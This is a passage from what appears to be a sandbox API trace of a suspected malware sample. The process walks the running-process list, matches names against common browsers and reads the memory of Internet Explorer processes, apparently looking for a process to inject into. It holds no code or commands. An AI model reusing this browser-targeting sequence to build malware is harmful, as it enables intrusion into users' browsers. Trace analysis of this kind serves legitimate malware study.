	[0239.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.414] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0239.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.415] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.415] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0239.416] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0239.416] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0239.417] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x804c
	[0239.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.417] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0239.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.417] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.418] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0239.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.418] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.419] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0239.420] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x8050
	[0239.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.420] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0239.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.420] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.420] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0239.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.421] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.421] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0239.422] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x8054
	[0239.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.422] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0239.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.422] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.422] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0239.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.423] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.423] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0239.424] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x8058
	[0239.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.424] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0239.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.424] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.424] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0239.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.425] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.425] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0239.426] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x805c
	[0239.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.426] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0239.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.426] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.438] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0239.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.438] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.439] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0239.439] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x8060
	[0239.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.440] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0239.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.440] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.440] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0239.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.440] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.441] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0239.441] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x8064
	[0239.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.442] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0239.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.442] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.442] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0239.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.443] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.443] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0239.444] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x8068
	[0239.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.444] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0239.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.444] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.446] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0239.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.446] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.447] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0239.447] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x806c
	[0239.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.447] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0239.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.448] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.448] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0239.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.448] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.448] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0239.449] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x8070
	[0239.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.449] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0239.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.450] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.450] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0239.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.450] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.450] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0239.451] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x8074
	[0239.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.451] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0239.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.452] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.452] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0239.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.453] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.453] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0239.454] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x8078
	[0239.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.454] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0239.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.454] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.455] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0239.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.456] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.456] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0239.457] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x807c
	[0239.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.457] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0239.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.457] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.458] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0239.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.458] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.459] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0239.459] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x8080
	[0239.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.460] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0239.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.460] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.461] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0239.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.462] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.462] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0239.463] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x8084
	[0239.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.463] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0239.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.464] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.464] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0239.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.465] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.465] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0239.466] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x8088
	[0239.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.466] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0239.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.466] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0239.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.467] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0239.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.467] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.467] NtQueryInformationProcess (in: ProcessHandle=0x8088, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0239.467] ReadProcessMemory (in: hProcess=0x8088, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0239.467] ReadProcessMemory (in: hProcess=0x8088, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0239.467] ReadProcessMemory (in: hProcess=0x8088, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0239.468] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0239.468] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0239.469] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x808c
	[0239.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.469] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0239.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.469] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0239.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.469] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0239.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.470] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.470] NtQueryInformationProcess (in: ProcessHandle=0x808c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0239.470] ReadProcessMemory (in: hProcess=0x808c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0239.470] ReadProcessMemory (in: hProcess=0x808c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0239.470] ReadProcessMemory (in: hProcess=0x808c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0239.470] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0239.470] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0239.471] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x8090
	[0239.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.471] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0239.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.472] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.472] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0239.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.472] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.472] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0239.473] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x8094
	[0239.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.473] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0239.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.474] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.474] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0239.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.474] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.474] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.475] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x8098
	[0239.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.475] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.476] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.477] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.477] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.478] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.478] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.479] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x809c
	[0239.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.479] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.480] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.480] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.480] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.480] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.481] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x80a0
	[0239.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.481] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.482] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
